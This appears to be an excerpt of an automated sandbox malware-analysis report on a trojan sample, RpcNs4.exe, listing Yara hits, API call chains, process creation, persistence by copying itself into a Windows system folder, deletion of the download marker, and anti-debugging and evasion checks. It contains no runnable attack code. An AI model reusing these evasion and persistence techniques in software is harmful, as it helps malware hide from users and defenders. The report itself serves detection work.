                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.51279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.5e052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.51052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.51052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.5e279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.517659433.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.256801219.00000000005F4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.256746048.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.519022380.0000000002094000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B2580 CryptCreateHash,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,GetProcessHeap,RtlAllocateHeap,4_2_020B2580
                      Source: RpcNs4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\RpcNs4.exeFile deleted: C:\Windows\SysWOW64\rasphone\networkitemfactory.exe:Zone.IdentifierJump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeFile created: C:\Windows\SysWOW64\rasphone\Jump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00403B792_2_00403B79
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_004160CC2_2_004160CC
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_004091632_2_00409163
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_004169192_2_00416919
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0041B92F2_2_0041B92F
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0041A1362_2_0041A136
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_004079A12_2_004079A1
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0041EAA32_2_0041EAA3
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00412B632_2_00412B63
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00420B082_2_00420B08
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00415BD82_2_00415BD8
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0041AC132_2_0041AC13
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0041D4392_2_0041D439
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_004164E42_2_004164E4
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00416D4E2_2_00416D4E
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0041A6A12_2_0041A6A1
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B3B502_2_020B3B50
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B78302_2_020B7830
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B3E702_2_020B3E70
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B1C102_2_020B1C10
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B3C902_2_020B3C90
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B64F02_2_020B64F0
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_00403B794_2_00403B79
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_004160CC4_2_004160CC
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_004091634_2_00409163
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_004169194_2_00416919
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_0041B92F4_2_0041B92F
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_0041A1364_2_0041A136
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_004079A14_2_004079A1
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_0041EAA34_2_0041EAA3
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_00412B634_2_00412B63
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_00420B084_2_00420B08
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_00415BD84_2_00415BD8
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_0041AC134_2_0041AC13
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_0041D4394_2_0041D439
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_004164E44_2_004164E4
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_00416D4E4_2_00416D4E
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_0041A6A14_2_0041A6A1
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B3B504_2_020B3B50
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B78304_2_020B7830
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B3E704_2_020B3E70
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B1C104_2_020B1C10
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B3C904_2_020B3C90
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B64F04_2_020B64F0
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: String function: 00406830 appears 42 times
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: String function: 00406EE5 appears 34 times
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: String function: 00406830 appears 42 times
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: String function: 00406EE5 appears 34 times
                      Source: RpcNs4.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: RpcNs4.exeVirustotal: Detection: 78%
                      Source: RpcNs4.exeMetadefender: Detection: 73%
                      Source: RpcNs4.exeReversingLabs: Detection: 89%
                      Source: RpcNs4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\RpcNs4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\RpcNs4.exe 'C:\Users\user\Desktop\RpcNs4.exe'
                      Source: C:\Users\user\Desktop\RpcNs4.exeProcess created: C:\Windows\SysWOW64\rasphone\networkitemfactory.exe C:\Windows\SysWOW64\rasphone\networkitemfactory.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RpcNs4.exeProcess created: C:\Windows\SysWOW64\rasphone\networkitemfactory.exe C:\Windows\SysWOW64\rasphone\networkitemfactory.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winEXE@16/5@0/88
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: CloseServiceHandle,OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,2_2_020B8830
                      Source: C:\Users\user\Desktop\RpcNs4.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B4BF0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32NextW,Process32FirstW,CloseHandle,FindCloseChangeNotification,4_2_020B4BF0
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4636:120:WilError_01
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00406875 push ecx; ret 2_2_00406888
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0040F141 push ecx; ret 2_2_0040F154
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5E10 push ecx; mov dword ptr [esp], 00004C6Fh2_2_020B5E11
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5EC0 push ecx; mov dword ptr [esp], 000098C7h2_2_020B5EC1
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5F00 push ecx; mov dword ptr [esp], 0000B789h2_2_020B5F01
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5F50 push ecx; mov dword ptr [esp], 0000285Dh2_2_020B5F51
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5C40 push ecx; mov dword ptr [esp], 00008691h2_2_020B5C41
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5C70 push ecx; mov dword ptr [esp], 0000B66Ah2_2_020B5C71
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5CB0 push ecx; mov dword ptr [esp], 000001F6h2_2_020B5CB1
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5CF0 push ecx; mov dword ptr [esp], 00003EEDh2_2_020B5CF1
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5D30 push ecx; mov dword ptr [esp], 0000E6FEh2_2_020B5D31
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5D80 push ecx; mov dword ptr [esp], 00001B06h2_2_020B5D81
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B5DA0 push ecx; mov dword ptr [esp], 000086AAh2_2_020B5DA1
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_00406875 push ecx; ret 4_2_00406888
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_0040F141 push ecx; ret 4_2_0040F154
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5E10 push ecx; mov dword ptr [esp], 00004C6Fh4_2_020B5E11
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5EC0 push ecx; mov dword ptr [esp], 000098C7h4_2_020B5EC1
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5F00 push ecx; mov dword ptr [esp], 0000B789h4_2_020B5F01
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5F50 push ecx; mov dword ptr [esp], 0000285Dh4_2_020B5F51
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5C40 push ecx; mov dword ptr [esp], 00008691h4_2_020B5C41
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5C70 push ecx; mov dword ptr [esp], 0000B66Ah4_2_020B5C71
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5CB0 push ecx; mov dword ptr [esp], 000001F6h4_2_020B5CB1
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5CF0 push ecx; mov dword ptr [esp], 00003EEDh4_2_020B5CF1
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5D30 push ecx; mov dword ptr [esp], 0000E6FEh4_2_020B5D31
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5D80 push ecx; mov dword ptr [esp], 00001B06h4_2_020B5D81
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5DA0 push ecx; mov dword ptr [esp], 000086AAh4_2_020B5DA1
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00401880 _malloc,LoadLibraryA,GetProcAddress,2_2_00401880

                      Persistence and Installation Behavior:

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: C:\Users\user\Desktop\RpcNs4.exeExecutable created and started: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeJump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exePE file moved: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\RpcNs4.exeFile opened: C:\Windows\SysWOW64\rasphone\networkitemfactory.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00403B79 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00403B79

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\Desktop\RpcNs4.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-21718
                      Source: C:\Windows\System32\svchost.exe TID: 3132Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeAPI coverage: 8.5 %
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B3890 _snwprintf,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,2_2_020B3890
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B3890 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,4_2_020B3890
                      Source: C:\Users\user\Desktop\RpcNs4.exeAPI call chain: ExitProcess graph end nodegraph_2-21450
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeAPI call chain: ExitProcess graph end nodegraph_4-22365
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeAPI call chain: ExitProcess graph end nodegraph_4-21915
                      Source: C:\Users\user\Desktop\RpcNs4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 00000005.00000002.519834016.000001A00E260000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.517847536.000001A008A29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000007.00000002.517367438.0000021F46802000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000007.00000002.517433093.0000021F46828000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.517881294.0000023333664000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.517673418.0000024160029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00406A89 _memset,IsDebuggerPresent,2_2_00406A89
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0040E3C3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0040E3C3
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00401880 _malloc,LoadLibraryA,GetProcAddress,2_2_00401880
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0040408A GetProcessHeap,2_2_0040408A
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B3E70 mov eax, dword ptr fs:[00000030h]2_2_020B3E70
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B4D60 mov eax, dword ptr fs:[00000030h]2_2_020B4D60
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B3E70 mov eax, dword ptr fs:[00000030h]4_2_020B3E70
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B4D60 mov eax, dword ptr fs:[00000030h]4_2_020B4D60
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_02091030 mov eax, dword ptr fs:[00000030h]4_2_02091030
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00406769 SetUnhandledExceptionFilter,2_2_00406769
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0040679A SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040679A
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_00406769 SetUnhandledExceptionFilter,4_2_00406769
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_0040679A SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040679A
                      Source: networkitemfactory.exe, 00000004.00000002.518757751.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: networkitemfactory.exe, 00000004.00000002.518757751.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: networkitemfactory.exe, 00000004.00000002.518757751.0000000000C80000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: networkitemfactory.exe, 00000004.00000002.518757751.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: networkitemfactory.exe, 00000004.00000002.518757751.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0041989E
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0041994B
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0040D16E
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_0041119A
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_004191AF
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00419A1F
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_0041947F
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: EnumSystemLocalesW,2_2_00419423
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0040FC2A
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_004194FC
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00410D5A
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_0041957F
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: EnumSystemLocalesW,2_2_0040FE0B
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: GetLocaleInfoW,2_2_0040FE91
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00419774
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_00415723
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004117D4
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0041989E
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: GetLocaleInfoW,_GetPrimaryLen,4_2_0041994B
